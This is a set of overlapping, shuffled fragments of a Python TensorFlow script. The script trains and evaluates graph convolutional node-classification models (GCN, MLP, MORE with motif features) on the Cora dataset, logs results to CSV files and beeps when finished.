"in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the",
"+ 1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures,",
"# Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') #",
"embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the",
"[la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate =",
"GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used num_supports =",
"y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features =",
"'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout",
"== 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model",
"= chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model",
"Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session()",
"+ FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] #",
"# Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']:",
"tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable",
"= time.time() stop_epoch = epoch + 1 # Construct feed dictionary feed_dict =",
"FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time()",
"open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in",
"+ 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() -",
"of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden',",
"Not used num_supports = 1 model_func = MLP elif FLAGS.model == 'MORE': support",
"= evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping",
"y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features)",
"from Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set random",
"val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\",",
"preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func =",
"open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch,",
"False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le",
"function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val =",
"property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [],",
"break print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping *",
"= [], [], [] # Train model train_starttime = time.time() train_time_list = []",
"tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model',",
"FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif",
"evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support,",
"'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run",
"number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method',",
"val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as",
"256, 512] mode_list = [] for i in range(0, 4): temp1 = [lr[i],",
"Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures,",
"epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4,",
"model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support,",
"used num_supports = 1 model_func = MORE else: raise ValueError('Invalid argument for model:",
"% (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\",",
"placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)),",
"= [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MORE else: raise",
"tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.')",
"= load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model",
"f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time))",
"tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model",
"\"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime #",
"(time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc",
"features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing",
"variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders,",
"= [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train, y_val, y_test,",
"= model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() # Define model",
"i in range(0, 4): temp1 = [lr[i], le[i]] for j in range(0, 3):",
"train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time()",
"if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le =",
"t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures,",
"number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method ----",
"tf import winsound from Code_utils import * from Code_models import GCN, MLP, MORE",
"2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512]",
"for i in range(0, 4): temp1 = [lr[i], le[i]] for j in range(0,",
"import GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set random seed seed",
"mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs",
"* 2, 20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features,",
"of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\",",
"+ str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in",
"Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time() test_cost, test_acc,",
"step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc,",
"support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model == 'gcn_cheby':",
"range(0, 3): temp2 = temp1 + [mo[j]] for k in range(0, 5): temp3",
"'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn',",
"Load data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset)",
"motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the",
"if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN",
"1 model_func = MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not",
"tensorflow as tf import winsound from Code_utils import * from Code_models import GCN,",
"support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MORE else:",
"= temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59",
"stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping",
"# Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask,",
"= [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MLP elif FLAGS.model",
"test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\",",
"GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set random seed seed =",
"Data: 2020-01-10 # Function: Run training #-------------------------- import package --------------------------# from __future__ import",
"for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (#",
"# Validation cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost)",
"support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels,",
"* from Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set",
"feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val =",
"'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs",
"1 model_func = MORE else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model))",
"features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the",
"evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val",
"feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) #",
"import time import tensorflow as tf import winsound from Code_utils import * from",
"motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early",
"flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout',",
"FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le = [300, 500,",
"le = [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la =",
"ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define placeholders placeholders = {",
"\"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc,",
"division from __future__ import print_function import time import tensorflow as tf import winsound",
"1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders)",
"test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures)",
"0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5,",
"= mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden =",
"helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model =",
"= tf.Session() # Define model evaluation function def evaluate(features, support, labels, mask, motiffeatures,",
"'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination')",
"FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense':",
"session sess = tf.Session() # Define model evaluation function def evaluate(features, support, labels,",
"layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method",
"= [32, 64, 128, 256, 512] mode_list = [] for i in range(0,",
"range(0, 4): temp1 = [lr[i], le[i]] for j in range(0, 3): temp2 =",
"feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step",
"time import tensorflow as tf import winsound from Code_utils import * from Code_models",
"time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set",
"train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for",
"features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)]",
"f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for",
"# Sound duration = 500 # millisecond freq = 600 # Hz winsound.Beep(freq,",
"temp1 = [lr[i], le[i]] for j in range(0, 3): temp2 = temp1 +",
"hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') #",
"learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate",
"FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE',",
"= [] train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss =",
"model_func = GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used",
"construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0],",
"[preprocess_adj(adj)] # Not used num_supports = 1 model_func = MLP elif FLAGS.model ==",
"[mode[3]] # Load data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures",
"16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial",
"cost_val = [] train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss",
"with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i",
"train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc:",
"flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for",
"test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if",
"motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch +",
"4): temp1 = [lr[i], le[i]] for j in range(0, 3): temp2 = temp1",
"max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss:",
"input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() # Define model evaluation function",
"'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout",
"evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\",",
"for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels':",
"str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)],",
"\"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() -",
"num_supports = 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support",
"embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model",
"Function: Run training #-------------------------- import package --------------------------# from __future__ import division from __future__",
"temp2 = temp1 + [mo[j]] for k in range(0, 5): temp3 = temp2",
"{:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f:",
"# 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number",
"train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss = [], [],",
"cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime",
"in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in",
"MORE else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define placeholders",
"- t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc)",
"flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number",
"= 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support =",
"'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model ==",
"'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property",
"i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in",
"y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features",
"placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2])",
"'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial",
"_ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32,",
"= temp1 + [mo[j]] for k in range(0, 5): temp3 = temp2 +",
"model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() #",
"= preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func",
"Train model train_starttime = time.time() train_time_list = [] stop_epoch = 0 for epoch",
"FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden",
"early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer",
"} # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess",
"time.time() stop_epoch = epoch + 1 # Construct feed dictionary feed_dict = construct_feed_dict(features,",
"\"Hadamard\", 'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" #",
"FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train, y_val,",
"construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs =",
"flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden",
"use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le = [300,",
"FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] #",
"Validation cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc)",
"15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2]",
"layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of",
"str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f:",
"64, 128, 256, 512] mode_list = [] for i in range(0, 4): temp1",
"(1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.')",
"flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.')",
"512] mode_list = [] for i in range(0, 4): temp1 = [lr[i], le[i]]",
"1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports",
"= MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used num_supports",
"0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1",
"'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.')",
"tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session",
"= time.time() train_time_list = [] stop_epoch = 0 for epoch in range(FLAGS.epochs): t",
"\"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512] mode_list = [] for",
"support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1]",
"\"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration =",
"import * from Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------# #",
"= time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test",
"from __future__ import print_function import time import tensorflow as tf import winsound from",
"in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc:",
"in range(0, 3): temp2 = temp1 + [mo[j]] for k in range(0, 5):",
"MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used num_supports =",
"raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define placeholders placeholders =",
"flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning",
"time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy],",
"= time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing",
"y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration))",
"\"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() -",
"Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora',",
"format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\",",
"shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout':",
"Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the",
"train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures,",
"train_time_list = [] stop_epoch = 0 for epoch in range(FLAGS.epochs): t = time.time()",
"FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as",
"dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0.,",
"load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model ==",
"feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support, y_val, val_mask,",
"= sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration =",
"# Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags =",
"probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance",
"Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration =",
"= mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load",
"---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model =",
"elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree",
"i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond freq",
"print_function import time import tensorflow as tf import winsound from Code_utils import *",
"Finished!\") train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):]",
"f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 #",
"winsound from Code_utils import * from Code_models import GCN, MLP, MORE #--------------------------- main",
